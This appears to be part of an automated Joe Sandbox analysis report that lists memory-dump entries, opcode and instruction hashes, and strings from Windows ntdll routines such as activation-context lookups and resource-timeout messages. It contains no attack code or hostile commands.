                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7dedaa9c668f7698e014b2b94814e0ae3b908c0e219f01a5b356d097f900bd89
                                                          • Instruction ID: 048e0afb0ba26e068dbb8240acb0d4fbee623ce6b4903716a41e69c08d0953f9
                                                          • Opcode Fuzzy Hash: 7dedaa9c668f7698e014b2b94814e0ae3b908c0e219f01a5b356d097f900bd89
                                                          • Instruction Fuzzy Hash: 78F0EC70A00348EBDB04CBA9D56AE8EB7F8EF08704F040058E202EB281EA78E9058718
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ad43c84c8cac2d12199f2e2defbcbaafc3f996f1337d96422bc6e7aa5b71100
                                                          • Instruction ID: d92ab4c4d89a2beeff7e0e506a8e10d05a007b835f9796cf23ef4f10de972d42
                                                          • Opcode Fuzzy Hash: 7ad43c84c8cac2d12199f2e2defbcbaafc3f996f1337d96422bc6e7aa5b71100
                                                          • Instruction Fuzzy Hash: EEF082B0B1534CEBDB04DBA9D516E9EB7B8AF08308F440059E911EB2C1EA74E905C754
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                          • Instruction ID: 7f70e34d80b6a5f0a1c7227ed21b2deefb67b4be2af117ae27f18690257a9764
                                                          • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                          • Instruction Fuzzy Hash: 64F0AB3360421467C230AA0D8C01F9BFBACCBD5B30F24031AB9208B1E0CA74E901C7D6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6596c2d9f40eaed8ff68764726347ae12c60f95e6ae7b8c6ab8d12e1d2c38401
                                                          • Instruction ID: 1f30065d1b607225c998bc67cc1da9b8816019128fbb34fea72408d5018c8f27
                                                          • Opcode Fuzzy Hash: 6596c2d9f40eaed8ff68764726347ae12c60f95e6ae7b8c6ab8d12e1d2c38401
                                                          • Instruction Fuzzy Hash: 26F0E270A04308EBCB04CBA9E446E9EB7B8EF09304F500058E411EB2D1EA74E9048714
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7380c6dc114b08748cc61ffa05c64ef388872c7894410f2d1f9cd78b12d2fb01
                                                          • Instruction ID: 41f12319921d36c532974d0f3baf8289b4fafb4f9bb4f02a656efe9d1c4e21ed
                                                          • Opcode Fuzzy Hash: 7380c6dc114b08748cc61ffa05c64ef388872c7894410f2d1f9cd78b12d2fb01
                                                          • Instruction Fuzzy Hash: 43F0A0B9A19694DFE317C798C184F8277EDBB08BB0F058561D40D8B512C7A8DC80C292
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fc917d796cffd0f966c40ca0dc64d3610bb910ef7dd96acbfbbf3d553c92a5c
                                                          • Instruction ID: ab4519175036568e6255dc0c4577a4e78822af73fbdc9b3ed14b943015469706
                                                          • Opcode Fuzzy Hash: 7fc917d796cffd0f966c40ca0dc64d3610bb910ef7dd96acbfbbf3d553c92a5c
                                                          • Instruction Fuzzy Hash: AAF08270B14348EBDB04DBA9E556EAEB3B8AF08704F440058E901EB281EA75E905C754
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                          • Instruction ID: 79c08790c7c157ca4cef0b5725904aed98e1d3b0462c456b579e7aed8da14501
                                                          • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                          • Instruction Fuzzy Hash: D5E0ED33265714ABD2218B16D800F02BB69FF90BB0F208629E458175A18BA4F922CAD4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                          • Instruction ID: 60ee7758c345217b253ad8c0ac3a809334bb9f7b25afbd7188c5511375c89803
                                                          • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                          • Instruction Fuzzy Hash: 74E06DB2220200ABD754CB54CD01FA673ACFB04761F540258B516970E0DAB8BE40CB60
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                          • Instruction ID: 223e2545bbbac2a83b0a262ceef8de9ea76412a31a15703eea6593dd9ddcb33c
                                                          • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                          • Instruction Fuzzy Hash: B4E0CD31385214B7D7225A40CC01F65B766DB407D0F108031FE085A650CA75BD51DAD4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83fac42b7a24869f8f90648a53729e787fef309ebf89f02fc0631ade7ee57f23
                                                          • Instruction ID: 003d163dfb06c5a918541f4f3147e99d174220fa85c9105f9cc79f10d64d0192
                                                          • Opcode Fuzzy Hash: 83fac42b7a24869f8f90648a53729e787fef309ebf89f02fc0631ade7ee57f23
                                                          • Instruction Fuzzy Hash: B0F03279251B80CBE21ACF08C1A1B1537BDFB49B00F800058C8468FBA1CB3AEA42CA40
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                          • Instruction ID: 63aca6baa7dcd5845b3551ef7afd5731f4e1a0e97936ed58e7dc42e6876092fe
                                                          • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                          • Instruction Fuzzy Hash: AAD05E32261660EFC7326F21EE05F827BB7AF84B11F450528B402264F186B5FE95C691
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                          • Instruction ID: 33bfded1965874e6fcaa64bd450c115900a37747603d0304b50205e58903121e
                                                          • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                          • Instruction Fuzzy Hash: 53D0177A945AC48FE317CB04C161B407BF8F705F80F850098E0424BAA2C77C9984CB10
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                          • Instruction ID: 49a5022241d534537d70d4e1c46d213343029ef9896d5b9883185a3d708debaf
                                                          • Opcode Fuzzy Hash: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                          • Instruction Fuzzy Hash: 81C012319960249BCF219A14C944A85B779BB443C0FA50090D00863560D638EE41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                          • Instruction ID: b99568b38ae9c17a793a42187fb00ae34eaa45a76af2eb5e0ebec8d1fff18701
                                                          • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                          • Instruction Fuzzy Hash: D5C080F41515406AE7078711C901F1C36547B087D5FD4115C6A41294A1C35C9C42C214
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64ae39bbf8d1a49d4815f250df90ad7e74f2c4aa380e9d0f35f6b2c7bd072de2
                                                          • Instruction ID: 1e570bc51aa30e21ab30bbc74413e3713f2203a5d3ef71d5469664a64d9efd22
                                                          • Opcode Fuzzy Hash: 64ae39bbf8d1a49d4815f250df90ad7e74f2c4aa380e9d0f35f6b2c7bd072de2
                                                          • Instruction Fuzzy Hash: 5690022224190802D14471588418707001A8BD0601F95C0A3A0024514DC61A8A6966B1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 555ffbaf66a1256c322c9819ba37b1e1e0aa3267885a1bae0c9a25706af89c44
                                                          • Instruction ID: d9a18f40d41362f5decf14c5eb9f674495f3f7f79acbb381c5dcd1dae632946f
                                                          • Opcode Fuzzy Hash: 555ffbaf66a1256c322c9819ba37b1e1e0aa3267885a1bae0c9a25706af89c44
                                                          • Instruction Fuzzy Hash: 50900222201D4442D14472584808B0F41194BE1202FD5C0ABA4156514CC91989595721

                                                          Control-flow Graph (rendered graph not recoverable as text; legend: Executed / Not Executed). Entry block 35957630; calls 3592e660, 35964c30, 35957818, 359577cd, 35957728, 359af290, 35969020, RtlDebugPrintTimes, BaseQueryModuleData, 3595771b, 35962c50, 35964d48, 3596aaa0, 3596a770, 3599cf9e.
                                                          Strings
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35994655
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 35994742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 359946FC
                                                          • ExecuteOptions, xrefs: 359946A0
                                                          • Execute=1, xrefs: 35994713
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 35994787
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35994725
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 8650418c3be3b16ee6fff1afab46b265e83c5e4c0547b2a57c3954186d638a01
                                                          • Instruction ID: 48a8dfb1c6745de05ad1ad1ea1301e04373ed950a41f178d5b0c2537fb45640e
                                                          • Opcode Fuzzy Hash: 8650418c3be3b16ee6fff1afab46b265e83c5e4c0547b2a57c3954186d638a01
                                                          • Instruction Fuzzy Hash: 5C514775600319AAEB11DBA4EC85FED73BCBF083A4F040899E505A7181EB71AB59CF61

                                                          Control-flow Graph (rendered graph not recoverable as text; legend: Executed / Not Executed). Entry block 3593d770; calls 35964c30, 359af290, 3593d660, 35968250, 3593a6e0, 359782c0, 35924508, RtlDebugPrintTimes.
                                                          APIs
                                                          Strings
                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 3598936B
                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 35989341, 35989366
                                                          • GsHd, xrefs: 3593D874
                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35989565
                                                          • Actx , xrefs: 35989508
                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35989346
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                          • API String ID: 3446177414-2196497285
                                                          • Opcode ID: abcd8a9dce74a9066631957d6e81ada4fce015f7eeb0d62c4ba00d85a100fa0d
                                                          • Instruction ID: 881861ef49533c9af5c3f350c09b29ce1d0e4e14b0bd2661d77e2ca5eb71538d
                                                          • Opcode Fuzzy Hash: abcd8a9dce74a9066631957d6e81ada4fce015f7eeb0d62c4ba00d85a100fa0d
                                                          • Instruction Fuzzy Hash: E8E1C474609302CFE710CF64C891B5AB7F9BF49398F454A2DE896CB281D771E948CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                          • Instruction ID: 2d1833444b55c84c6288e2b79897e999f3fcfc1621efb7bcad0d449dbdd7b93a
                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                          • Instruction Fuzzy Hash: 25810578E093098EEF14CE64C8507EEBBBBBF45378F58411AD891A7681EB349848CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$@
                                                          • API String ID: 3446177414-1194432280
                                                          • Opcode ID: a2f81077e3d3833448af186d9a607d0c4b4fc4f6fdb6b2ebd44e979291b48ac1
                                                          • Instruction ID: c0dab80f85195590ef75690e993b294bb5f71a05fa61a63636953d317d7eb477
                                                          • Opcode Fuzzy Hash: a2f81077e3d3833448af186d9a607d0c4b4fc4f6fdb6b2ebd44e979291b48ac1
                                                          • Instruction Fuzzy Hash: DE8118B5D042699FDB21CB54CD45BDEB7B8AF08750F0041EAE91AB7281E7709E85CFA0
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3599728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 35997294
                                                          • RTL: Re-Waiting, xrefs: 359972C1
                                                          • RTL: Resource at %p, xrefs: 359972A3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 347ecd733d69148f99bc5730e00df50da2799dcfca2369637776b015630e3b05
                                                          • Instruction ID: 00756dbedafe11658aeaf9bee578c667748a6d7b47c2b3dfbf412c3945c1bd78
                                                          • Opcode Fuzzy Hash: 347ecd733d69148f99bc5730e00df50da2799dcfca2369637776b015630e3b05
                                                          • Instruction Fuzzy Hash: 3E41EF35704206ABE725CF24CC41F9AB7A6FF85760F100A19FD55AB240EB21F816CBE1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 8ecc3885bfe21602710cefdecdc7d7ced872827410af6af4fbcd3faef0539866
                                                          • Instruction ID: 6aeb95f073b2135e3b3ce2eb9e3798c3735ca644fa319f0de4b81019f94f2510
                                                          • Opcode Fuzzy Hash: 8ecc3885bfe21602710cefdecdc7d7ced872827410af6af4fbcd3faef0539866
                                                          • Instruction Fuzzy Hash: E15122B5E042199FEF0ACF99E846ACCFBB5FF48394F14812AE805AB250D7389941CF50